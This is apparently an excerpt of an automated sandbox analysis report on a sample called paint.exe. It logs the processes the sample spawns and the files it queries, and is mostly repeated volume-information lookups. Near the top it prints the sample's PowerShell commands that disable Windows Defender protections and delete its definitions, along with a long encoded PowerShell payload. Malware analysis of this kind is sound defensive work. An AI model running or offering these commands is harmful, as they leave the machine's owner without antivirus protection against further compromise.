acwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe

Code function: 88_2_00007FF623E1B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

88_2_00007FF623E1B340

Source: C:\Users\user\Desktop\paint.exe

Code function: 0_2_00007FF6F0BF95E0 cpuid

0_2_00007FF6F0BF95E0

Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\ucrtbase.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
